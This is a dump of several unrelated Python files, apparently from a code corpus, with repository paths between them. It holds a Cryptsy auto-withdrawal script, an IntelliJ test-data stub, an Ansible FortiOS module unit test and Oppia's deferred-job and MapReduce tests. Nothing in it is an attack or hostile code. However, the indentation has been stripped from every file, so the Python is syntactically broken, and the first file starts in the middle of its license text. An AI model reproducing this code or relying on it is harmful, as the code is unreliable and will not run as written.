# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import sys
sys.path.insert(0, './PyCryptsy/')
from PyCryptsy import PyCryptsy
from decimal import *
import ConfigParser
import pprint
import time
Config = ConfigParser.ConfigParser()
Config.read('./coinswitch.conf')
api=PyCryptsy(Config.get("Cryptsy", "key"), Config.get("Cryptsy", "secret"))
getcontext().prec=8
while True:
balance=Decimal(api.Query("getinfo", {})["return"]["balances_available"]["BTC"])
print "balance: "+str(balance)+" BTC"
if (balance>0.01):
print "withdrawal triggered"
pprint.pprint(api.Query("makewithdrawal", {"address": Config.get("Cryptsy", "addr"), "amount": balance}))
time.sleep(float(Config.get("Misc", "interval")))
|
gnuhub/intellij-community
|
refs/heads/master
|
python/testData/completion/mro.after.py
|
83
|
class C(object):
pass
C.__mro__
|
Lujeni/ansible
|
refs/heads/devel
|
test/units/modules/network/fortios/test_fortios_switch_controller_global.py
|
21
|
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_switch_controller_global
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_switch_controller_global.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
def test_switch_controller_global_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'switch_controller_global': {
'allow_multiple_interfaces': 'enable',
'default_virtual_switch_vlan': 'test_value_4',
'https_image_push': 'enable',
'log_mac_limit_violations': 'enable',
'mac_aging_interval': '7',
'mac_retention_period': '8',
'mac_violation_timer': '9'
},
'vdom': 'root'}
is_error, changed, response = fortios_switch_controller_global.fortios_switch_controller(input_data, fos_instance)
expected_data = {
'allow-multiple-interfaces': 'enable',
'default-virtual-switch-vlan': 'test_value_4',
'https-image-push': 'enable',
'log-mac-limit-violations': 'enable',
'mac-aging-interval': '7',
'mac-retention-period': '8',
'mac-violation-timer': '9'
}
set_method_mock.assert_called_with('switch-controller', 'global', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_switch_controller_global_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'switch_controller_global': {
'allow_multiple_interfaces': 'enable',
'default_virtual_switch_vlan': 'test_value_4',
'https_image_push': 'enable',
'log_mac_limit_violations': 'enable',
'mac_aging_interval': '7',
'mac_retention_period': '8',
'mac_violation_timer': '9'
},
'vdom': 'root'}
is_error, changed, response = fortios_switch_controller_global.fortios_switch_controller(input_data, fos_instance)
expected_data = {
'allow-multiple-interfaces': 'enable',
'default-virtual-switch-vlan': 'test_value_4',
'https-image-push': 'enable',
'log-mac-limit-violations': 'enable',
'mac-aging-interval': '7',
'mac-retention-period': '8',
'mac-violation-timer': '9'
}
set_method_mock.assert_called_with('switch-controller', 'global', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_switch_controller_global_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'switch_controller_global': {
'allow_multiple_interfaces': 'enable',
'default_virtual_switch_vlan': 'test_value_4',
'https_image_push': 'enable',
'log_mac_limit_violations': 'enable',
'mac_aging_interval': '7',
'mac_retention_period': '8',
'mac_violation_timer': '9'
},
'vdom': 'root'}
is_error, changed, response = fortios_switch_controller_global.fortios_switch_controller(input_data, fos_instance)
expected_data = {
'allow-multiple-interfaces': 'enable',
'default-virtual-switch-vlan': 'test_value_4',
'https-image-push': 'enable',
'log-mac-limit-violations': 'enable',
'mac-aging-interval': '7',
'mac-retention-period': '8',
'mac-violation-timer': '9'
}
set_method_mock.assert_called_with('switch-controller', 'global', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_switch_controller_global_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'switch_controller_global': {
'random_attribute_not_valid': 'tag',
'allow_multiple_interfaces': 'enable',
'default_virtual_switch_vlan': 'test_value_4',
'https_image_push': 'enable',
'log_mac_limit_violations': 'enable',
'mac_aging_interval': '7',
'mac_retention_period': '8',
'mac_violation_timer': '9'
},
'vdom': 'root'}
is_error, changed, response = fortios_switch_controller_global.fortios_switch_controller(input_data, fos_instance)
expected_data = {
'allow-multiple-interfaces': 'enable',
'default-virtual-switch-vlan': 'test_value_4',
'https-image-push': 'enable',
'log-mac-limit-violations': 'enable',
'mac-aging-interval': '7',
'mac-retention-period': '8',
'mac-violation-timer': '9'
}
set_method_mock.assert_called_with('switch-controller', 'global', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
|
google-code-export/oppia
|
refs/heads/master
|
core/jobs_test.py
|
6
|
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for long running jobs and continuous computations."""
__author__ = 'Sean Lip'
import ast
from core import jobs
from core import jobs_registry
from core.domain import event_services
from core.domain import exp_domain
from core.domain import exp_services
from core.platform import models
(base_models, exp_models, stats_models) = models.Registry.import_models([
models.NAMES.base_model, models.NAMES.exploration, models.NAMES.statistics])
taskqueue_services = models.Registry.import_taskqueue_services()
transaction_services = models.Registry.import_transaction_services()
from core.tests import test_utils
import feconf
from google.appengine.ext import ndb
JOB_FAILED_MESSAGE = 'failed (as expected)'
class DummyJobManager(jobs.BaseDeferredJobManager):
@classmethod
def _run(cls):
return 'output'
class AnotherDummyJobManager(jobs.BaseDeferredJobManager):
@classmethod
def _run(cls):
return 'output'
class DummyFailingJobManager(jobs.BaseDeferredJobManager):
@classmethod
def _run(cls):
raise Exception(JOB_FAILED_MESSAGE)
class JobWithNoRunMethodManager(jobs.BaseDeferredJobManager):
pass
class JobManagerUnitTests(test_utils.GenericTestBase):
"""Test basic job manager operations."""
def test_create_new(self):
"""Test the creation of a new job."""
job_id = DummyJobManager.create_new()
self.assertTrue(job_id.startswith('DummyJob'))
self.assertEqual(
DummyJobManager.get_status_code(job_id), jobs.STATUS_CODE_NEW)
self.assertIsNone(DummyJobManager.get_time_queued_msec(job_id))
self.assertIsNone(DummyJobManager.get_time_started_msec(job_id))
self.assertIsNone(DummyJobManager.get_time_finished_msec(job_id))
self.assertIsNone(DummyJobManager.get_metadata(job_id))
self.assertIsNone(DummyJobManager.get_output(job_id))
self.assertIsNone(DummyJobManager.get_error(job_id))
self.assertFalse(DummyJobManager.is_active(job_id))
self.assertFalse(DummyJobManager.has_finished(job_id))
def test_enqueue_job(self):
"""Test the enqueueing of a job."""
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
self.assertEqual(
DummyJobManager.get_status_code(job_id), jobs.STATUS_CODE_QUEUED)
self.assertIsNotNone(DummyJobManager.get_time_queued_msec(job_id))
self.assertIsNone(DummyJobManager.get_output(job_id))
def test_failure_for_job_enqueued_using_wrong_manager(self):
job_id = DummyJobManager.create_new()
with self.assertRaisesRegexp(Exception, 'Invalid job type'):
AnotherDummyJobManager.enqueue(job_id)
def test_failure_for_job_with_no_run_method(self):
job_id = JobWithNoRunMethodManager.create_new()
JobWithNoRunMethodManager.enqueue(job_id)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
with self.assertRaisesRegexp(Exception, 'NotImplementedError'):
self.process_and_flush_pending_tasks()
def test_complete_job(self):
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
self.process_and_flush_pending_tasks()
self.assertEqual(
DummyJobManager.get_status_code(job_id),
jobs.STATUS_CODE_COMPLETED)
time_queued_msec = DummyJobManager.get_time_queued_msec(job_id)
time_started_msec = DummyJobManager.get_time_started_msec(job_id)
time_finished_msec = DummyJobManager.get_time_finished_msec(job_id)
self.assertIsNotNone(time_queued_msec)
self.assertIsNotNone(time_started_msec)
self.assertIsNotNone(time_finished_msec)
self.assertLess(time_queued_msec, time_started_msec)
self.assertLess(time_started_msec, time_finished_msec)
metadata = DummyJobManager.get_metadata(job_id)
output = DummyJobManager.get_output(job_id)
error = DummyJobManager.get_error(job_id)
self.assertIsNone(metadata)
self.assertEqual(output, 'output')
self.assertIsNone(error)
self.assertFalse(DummyJobManager.is_active(job_id))
self.assertTrue(DummyJobManager.has_finished(job_id))
def test_job_failure(self):
job_id = DummyFailingJobManager.create_new()
DummyFailingJobManager.enqueue(job_id)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
with self.assertRaisesRegexp(Exception, 'Task failed'):
self.process_and_flush_pending_tasks()
self.assertEqual(
DummyFailingJobManager.get_status_code(job_id),
jobs.STATUS_CODE_FAILED)
time_queued_msec = DummyFailingJobManager.get_time_queued_msec(job_id)
time_started_msec = DummyFailingJobManager.get_time_started_msec(
job_id)
time_finished_msec = DummyFailingJobManager.get_time_finished_msec(
job_id)
self.assertIsNotNone(time_queued_msec)
self.assertIsNotNone(time_started_msec)
self.assertIsNotNone(time_finished_msec)
self.assertLess(time_queued_msec, time_started_msec)
self.assertLess(time_started_msec, time_finished_msec)
metadata = DummyFailingJobManager.get_metadata(job_id)
output = DummyFailingJobManager.get_output(job_id)
error = DummyFailingJobManager.get_error(job_id)
self.assertIsNone(metadata)
self.assertIsNone(output)
self.assertIn(JOB_FAILED_MESSAGE, error)
self.assertFalse(DummyFailingJobManager.is_active(job_id))
self.assertTrue(DummyFailingJobManager.has_finished(job_id))
def test_status_code_transitions(self):
"""Test that invalid status code transitions are caught."""
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
DummyJobManager.register_start(job_id)
DummyJobManager.register_completion(job_id, 'output')
with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
DummyJobManager.enqueue(job_id)
with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
DummyJobManager.register_completion(job_id, 'output')
with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
DummyJobManager.register_failure(job_id, 'error')
def test_different_jobs_are_independent(self):
job_id = DummyJobManager.create_new()
another_job_id = AnotherDummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
DummyJobManager.register_start(job_id)
AnotherDummyJobManager.enqueue(another_job_id)
self.assertEqual(
DummyJobManager.get_status_code(job_id), jobs.STATUS_CODE_STARTED)
self.assertEqual(
AnotherDummyJobManager.get_status_code(another_job_id),
jobs.STATUS_CODE_QUEUED)
def test_cannot_instantiate_jobs_from_abstract_base_classes(self):
with self.assertRaisesRegexp(
Exception, 'directly create a job using the abstract base'):
jobs.BaseJobManager.create_new()
def test_cannot_enqueue_same_job_twice(self):
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
DummyJobManager.enqueue(job_id)
def test_can_enqueue_two_instances_of_the_same_job(self):
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
job_id_2 = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id_2)
def test_cancel_kills_queued_job(self):
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
self.assertTrue(DummyJobManager.is_active(job_id))
DummyJobManager.cancel(job_id, 'admin_user_id')
self.assertFalse(DummyJobManager.is_active(job_id))
self.assertEquals(
DummyJobManager.get_status_code(job_id), jobs.STATUS_CODE_CANCELED)
self.assertIsNone(DummyJobManager.get_output(job_id))
self.assertEquals(
DummyJobManager.get_error(job_id), 'Canceled by admin_user_id')
def test_cancel_kills_started_job(self):
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
self.assertTrue(DummyJobManager.is_active(job_id))
DummyJobManager.register_start(job_id)
# Cancel the job immediately after it has started.
DummyJobManager.cancel(job_id, 'admin_user_id')
# The job then finishes.
with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
DummyJobManager.register_completion(job_id, 'job_output')
self.assertFalse(DummyJobManager.is_active(job_id))
self.assertEquals(
DummyJobManager.get_status_code(job_id), jobs.STATUS_CODE_CANCELED)
# Note that no results are recorded for this job.
self.assertIsNone(DummyJobManager.get_output(job_id))
self.assertEquals(
DummyJobManager.get_error(job_id), 'Canceled by admin_user_id')
def test_cancel_does_not_kill_completed_job(self):
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
self.assertTrue(DummyJobManager.is_active(job_id))
# Complete the job.
self.process_and_flush_pending_tasks()
self.assertFalse(DummyJobManager.is_active(job_id))
self.assertEquals(
DummyJobManager.get_status_code(job_id),
jobs.STATUS_CODE_COMPLETED)
# Cancel the job after it has finished.
with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
DummyJobManager.cancel(job_id, 'admin_user_id')
# The job should still have 'completed' status.
self.assertFalse(DummyJobManager.is_active(job_id))
self.assertEquals(
DummyJobManager.get_status_code(job_id),
jobs.STATUS_CODE_COMPLETED)
self.assertEquals(DummyJobManager.get_output(job_id), 'output')
self.assertIsNone(DummyJobManager.get_error(job_id))
def test_cancel_does_not_kill_failed_job(self):
job_id = DummyFailingJobManager.create_new()
DummyFailingJobManager.enqueue(job_id)
self.assertTrue(DummyFailingJobManager.is_active(job_id))
with self.assertRaisesRegexp(Exception, 'Task failed'):
self.process_and_flush_pending_tasks()
self.assertFalse(DummyFailingJobManager.is_active(job_id))
self.assertEquals(
DummyFailingJobManager.get_status_code(job_id),
jobs.STATUS_CODE_FAILED)
# Cancel the job after it has finished.
with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
DummyFailingJobManager.cancel(job_id, 'admin_user_id')
# The job should still have 'failed' status.
self.assertFalse(DummyFailingJobManager.is_active(job_id))
self.assertEquals(
DummyFailingJobManager.get_status_code(job_id),
jobs.STATUS_CODE_FAILED)
self.assertIsNone(DummyFailingJobManager.get_output(job_id))
self.assertIn(
'raise Exception', DummyFailingJobManager.get_error(job_id))
def test_cancelling_multiple_unfinished_jobs(self):
job1_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job1_id)
job2_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job2_id)
DummyJobManager.register_start(job1_id)
DummyJobManager.register_start(job2_id)
DummyJobManager.cancel_all_unfinished_jobs('admin_user_id')
self.assertFalse(DummyJobManager.is_active(job1_id))
self.assertFalse(DummyJobManager.is_active(job2_id))
self.assertEquals(
DummyJobManager.get_status_code(job1_id),
jobs.STATUS_CODE_CANCELED)
self.assertEquals(
DummyJobManager.get_status_code(job2_id),
jobs.STATUS_CODE_CANCELED)
self.assertIsNone(DummyJobManager.get_output(job1_id))
self.assertIsNone(DummyJobManager.get_output(job2_id))
self.assertEquals(
'Canceled by admin_user_id', DummyJobManager.get_error(job1_id))
self.assertEquals(
'Canceled by admin_user_id', DummyJobManager.get_error(job2_id))
def test_cancelling_one_unfinished_job(self):
job1_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job1_id)
job2_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job2_id)
DummyJobManager.register_start(job1_id)
DummyJobManager.register_start(job2_id)
DummyJobManager.cancel(job1_id, 'admin_user_id')
with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
self.process_and_flush_pending_tasks()
DummyJobManager.register_completion(job2_id, 'output')
self.assertFalse(DummyJobManager.is_active(job1_id))
self.assertFalse(DummyJobManager.is_active(job2_id))
self.assertEquals(
DummyJobManager.get_status_code(job1_id),
jobs.STATUS_CODE_CANCELED)
self.assertEquals(
DummyJobManager.get_status_code(job2_id),
jobs.STATUS_CODE_COMPLETED)
self.assertIsNone(DummyJobManager.get_output(job1_id))
self.assertEquals(DummyJobManager.get_output(job2_id), 'output')
self.assertEquals(
'Canceled by admin_user_id', DummyJobManager.get_error(job1_id))
self.assertIsNone(DummyJobManager.get_error(job2_id))
TEST_INPUT_DATA = [(1, 2), (3, 4), (1, 5)]
SUM_MODEL_ID = 'all_data_id'
class NumbersModel(ndb.Model):
number = ndb.IntegerProperty()
class SumModel(ndb.Model):
total = ndb.IntegerProperty(default=0)
failed = ndb.BooleanProperty(default=False)
class TestDeferredJobManager(jobs.BaseDeferredJobManager):
"""Base class for testing deferred jobs."""
pass
class TestAdditionJobManager(TestDeferredJobManager):
"""Test job that sums all NumbersModel data.
The result is stored in a SumModel entity with id SUM_MODEL_ID.
"""
@classmethod
def _run(cls):
total = sum([
numbers_model.number for numbers_model in NumbersModel.query()])
SumModel(id=SUM_MODEL_ID, total=total).put()
class FailingAdditionJobManager(TestDeferredJobManager):
"""Test job that stores stuff in SumModel and then fails."""
IS_VALID_JOB_CLASS = True
@classmethod
def _run(cls):
total = sum([
numbers_model.number for numbers_model in NumbersModel.query()])
SumModel(id=SUM_MODEL_ID, total=total).put()
raise Exception('Oops, I failed.')
@classmethod
def _post_failure_hook(cls, job_id):
model = SumModel.get_by_id(SUM_MODEL_ID)
model.failed = True
model.put()
class DatastoreJobIntegrationTests(test_utils.GenericTestBase):
"""Tests the behavior of a job that affects data in the datastore.
This job gets all NumbersModel instances and sums their values, and puts
the summed values in a SumModel instance with id SUM_MODEL_ID. The
computation is redone from scratch each time the job is run.
"""
def _get_stored_total(self):
sum_model = SumModel.get_by_id(SUM_MODEL_ID)
return sum_model.total if sum_model else 0
def _populate_data(self):
"""Populate the datastore with four NumbersModel instances."""
NumbersModel(number=1).put()
NumbersModel(number=2).put()
NumbersModel(number=1).put()
NumbersModel(number=2).put()
def test_sequential_jobs(self):
self._populate_data()
self.assertEqual(self._get_stored_total(), 0)
TestAdditionJobManager.enqueue(
TestAdditionJobManager.create_new())
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
self.process_and_flush_pending_tasks()
self.assertEqual(self._get_stored_total(), 6)
NumbersModel(number=3).put()
TestAdditionJobManager.enqueue(
TestAdditionJobManager.create_new())
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
self.process_and_flush_pending_tasks()
self.assertEqual(self._get_stored_total(), 9)
def test_multiple_enqueued_jobs(self):
self._populate_data()
TestAdditionJobManager.enqueue(
TestAdditionJobManager.create_new())
NumbersModel(number=3).put()
TestAdditionJobManager.enqueue(
TestAdditionJobManager.create_new())
self.assertEqual(self.count_jobs_in_taskqueue(), 2)
self.process_and_flush_pending_tasks()
self.assertEqual(self._get_stored_total(), 9)
def test_failing_job(self):
self._populate_data()
job_id = FailingAdditionJobManager.create_new()
FailingAdditionJobManager.enqueue(job_id)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
with self.assertRaisesRegexp(
taskqueue_services.PermanentTaskFailure, 'Oops, I failed'):
self.process_and_flush_pending_tasks()
# The work that the failing job did before it failed is still done.
self.assertEqual(self._get_stored_total(), 6)
# The post-failure hook should have run.
self.assertTrue(SumModel.get_by_id(SUM_MODEL_ID).failed)
self.assertTrue(
FailingAdditionJobManager.get_status_code(job_id),
jobs.STATUS_CODE_FAILED)
class SampleMapReduceJobManager(jobs.BaseMapReduceJobManager):
"""Test job that counts the total number of explorations."""
@classmethod
def entity_classes_to_map_over(cls):
return [exp_models.ExplorationModel]
@staticmethod
def map(item):
yield ('sum', 1)
@staticmethod
def reduce(key, values):
yield (key, sum([int(value) for value in values]))
class MapReduceJobIntegrationTests(test_utils.GenericTestBase):
"""Tests MapReduce jobs end-to-end."""
def setUp(self):
"""Create an exploration so that there is something to count."""
super(MapReduceJobIntegrationTests, self).setUp()
exploration = exp_domain.Exploration.create_default_exploration(
'exp_id', 'title', 'A category')
exp_services.save_new_exploration('owner_id', exploration)
self.process_and_flush_pending_tasks()
def test_count_all_explorations(self):
job_id = SampleMapReduceJobManager.create_new()
SampleMapReduceJobManager.enqueue(job_id)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
self.process_and_flush_pending_tasks()
self.assertEqual(
SampleMapReduceJobManager.get_output(job_id), [['sum', 1]])
self.assertEqual(
SampleMapReduceJobManager.get_status_code(job_id),
jobs.STATUS_CODE_COMPLETED)
class JobRegistryTests(test_utils.GenericTestBase):
"""Tests job registry."""
def test_each_one_off_class_is_subclass_of_BaseJobManager(self):
for klass in jobs_registry.ONE_OFF_JOB_MANAGERS:
self.assertTrue(issubclass(klass, jobs.BaseJobManager))
def test_each_one_off_class_is_not_abstract(self):
for klass in jobs_registry.ONE_OFF_JOB_MANAGERS:
self.assertFalse(klass._is_abstract())
def test_validity_of_each_continuous_computation_class(self):
for klass in jobs_registry.ALL_CONTINUOUS_COMPUTATION_MANAGERS:
self.assertTrue(
issubclass(klass, jobs.BaseContinuousComputationManager))
event_types_listened_to = klass.get_event_types_listened_to()
self.assertTrue(isinstance(event_types_listened_to, list))
for event_type in event_types_listened_to:
self.assertTrue(isinstance(event_type, basestring))
self.assertTrue(issubclass(
event_services.Registry.get_event_class_by_type(
event_type),
event_services.BaseEventHandler))
rdc = klass._get_realtime_datastore_class()
self.assertTrue(issubclass(
rdc, jobs.BaseRealtimeDatastoreClassForContinuousComputations))
# The list of allowed base classes. This can be extended as the
# need arises, though we may also want to implement
# _get_continuous_computation_class() and
# _entity_created_before_job_queued() for other base classes
# that are added to this list.
ALLOWED_BASE_BATCH_JOB_CLASSES = [
jobs.BaseMapReduceJobManagerForContinuousComputations]
self.assertTrue(any([
issubclass(klass._get_batch_job_manager_class(), superclass)
for superclass in ALLOWED_BASE_BATCH_JOB_CLASSES]))
class JobQueriesTests(test_utils.GenericTestBase):
"""Tests queries for jobs."""
def test_get_data_for_recent_jobs(self):
self.assertEqual(jobs.get_data_for_recent_jobs(), [])
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
recent_jobs = jobs.get_data_for_recent_jobs()
self.assertEqual(len(recent_jobs), 1)
self.assertDictContainsSubset({
'id': job_id,
'status_code': jobs.STATUS_CODE_QUEUED,
'job_type': 'DummyJobManager',
'is_cancelable': True,
'error': None
}, recent_jobs[0])
class TwoClassesMapReduceJobManager(jobs.BaseMapReduceJobManager):
"""A test job handler that counts entities in two datastore classes."""
@classmethod
def entity_classes_to_map_over(cls):
return [exp_models.ExplorationModel, exp_models.ExplorationRightsModel]
@staticmethod
def map(item):
yield ('sum', 1)
@staticmethod
def reduce(key, values):
yield (key, sum([int(value) for value in values]))
class TwoClassesMapReduceJobIntegrationTests(test_utils.GenericTestBase):
"""Tests MapReduce jobs using two classes end-to-end."""
def setUp(self):
"""Create an exploration so that there is something to count."""
super(TwoClassesMapReduceJobIntegrationTests, self).setUp()
exploration = exp_domain.Exploration.create_default_exploration(
'exp_id', 'title', 'A category')
# Note that this ends up creating an entry in the
# ExplorationRightsModel as well.
exp_services.save_new_exploration('owner_id', exploration)
self.process_and_flush_pending_tasks()
def test_count_entities(self):
self.assertEqual(exp_models.ExplorationModel.query().count(), 1)
self.assertEqual(exp_models.ExplorationRightsModel.query().count(), 1)
job_id = TwoClassesMapReduceJobManager.create_new()
TwoClassesMapReduceJobManager.enqueue(job_id)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
self.process_and_flush_pending_tasks()
self.assertEqual(
TwoClassesMapReduceJobManager.get_output(job_id), [['sum', 2]])
self.assertEqual(
TwoClassesMapReduceJobManager.get_status_code(job_id),
jobs.STATUS_CODE_COMPLETED)
class StartExplorationRealtimeModel(
jobs.BaseRealtimeDatastoreClassForContinuousComputations):
count = ndb.IntegerProperty(default=0)
class StartExplorationMRJobManager(
jobs.BaseMapReduceJobManagerForContinuousComputations):
@classmethod
def _get_continuous_computation_class(cls):
return StartExplorationEventCounter
@classmethod
def entity_classes_to_map_over(cls):
return [stats_models.StartExplorationEventLogEntryModel]
@staticmethod
def map(item):
current_class = StartExplorationMRJobManager
if current_class._entity_created_before_job_queued(item):
yield (item.exploration_id, {
'event_type': item.event_type,
})
@staticmethod
def reduce(key, stringified_values):
started_count = 0
for value_str in stringified_values:
value = ast.literal_eval(value_str)
if value['event_type'] == feconf.EVENT_TYPE_START_EXPLORATION:
started_count += 1
stats_models.ExplorationAnnotationsModel(
id=key, num_starts=started_count).put()
class StartExplorationEventCounter(jobs.BaseContinuousComputationManager):
"""A continuous-computation job that counts 'start exploration' events.
This class should only be used in tests.
"""
@classmethod
def get_event_types_listened_to(cls):
return [feconf.EVENT_TYPE_START_EXPLORATION]
@classmethod
def _get_realtime_datastore_class(cls):
return StartExplorationRealtimeModel
@classmethod
def _get_batch_job_manager_class(cls):
return StartExplorationMRJobManager
@classmethod
def _kickoff_batch_job_after_previous_one_ends(cls):
"""Override this method so that it does not immediately start a
new MapReduce job. Non-test subclasses should not do this."""
pass
@classmethod
def _handle_incoming_event(
cls, active_realtime_layer, event_type, exp_id, exp_version,
state_name, session_id, params, play_type):
def _increment_counter():
realtime_class = cls._get_realtime_datastore_class()
realtime_model_id = realtime_class.get_realtime_id(
active_realtime_layer, exp_id)
realtime_model = realtime_class.get(
realtime_model_id, strict=False)
if realtime_model is None:
realtime_class(
id=realtime_model_id, count=1,
realtime_layer=active_realtime_layer).put()
else:
realtime_model.count += 1
realtime_model.put()
transaction_services.run_in_transaction(_increment_counter)
# Public query method.
@classmethod
def get_count(cls, exploration_id):
"""Return the number of 'start exploration' events received.
Answers the query by combining the existing MR job output and the
active realtime_datastore_class.
"""
mr_model = stats_models.ExplorationAnnotationsModel.get(
exploration_id, strict=False)
realtime_model = cls._get_realtime_datastore_class().get(
cls.get_active_realtime_layer_id(exploration_id), strict=False)
answer = 0
if mr_model is not None:
answer += mr_model.num_starts
if realtime_model is not None:
answer += realtime_model.count
return answer
class ContinuousComputationTests(test_utils.GenericTestBase):
"""Tests continuous computations for 'start exploration' events."""
EXP_ID = 'exp_id'
ALL_CONTINUOUS_COMPUTATION_MANAGERS_FOR_TESTS = [
StartExplorationEventCounter]
def setUp(self):
"""Create an exploration and register the event listener manually."""
super(ContinuousComputationTests, self).setUp()
exploration = exp_domain.Exploration.create_default_exploration(
self.EXP_ID, 'title', 'A category')
exp_services.save_new_exploration('owner_id', exploration)
self.process_and_flush_pending_tasks()
def test_continuous_computation_workflow(self):
"""An integration test for continuous computations."""
with self.swap(
jobs_registry, 'ALL_CONTINUOUS_COMPUTATION_MANAGERS',
self.ALL_CONTINUOUS_COMPUTATION_MANAGERS_FOR_TESTS):
self.assertEqual(
StartExplorationEventCounter.get_count(self.EXP_ID), 0)
# Record an event. This will put the event in the task queue.
event_services.StartExplorationEventHandler.record(
self.EXP_ID, 1, feconf.DEFAULT_INIT_STATE_NAME, 'session_id', {},
feconf.PLAY_TYPE_NORMAL)
self.assertEqual(
StartExplorationEventCounter.get_count(self.EXP_ID), 0)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
# When the task queue is flushed, the data is recorded in the two
# realtime layers.
self.process_and_flush_pending_tasks()
self.assertEqual(self.count_jobs_in_taskqueue(), 0)
self.assertEqual(
StartExplorationEventCounter.get_count(self.EXP_ID), 1)
self.assertEqual(StartExplorationRealtimeModel.get(
'0:%s' % self.EXP_ID).count, 1)
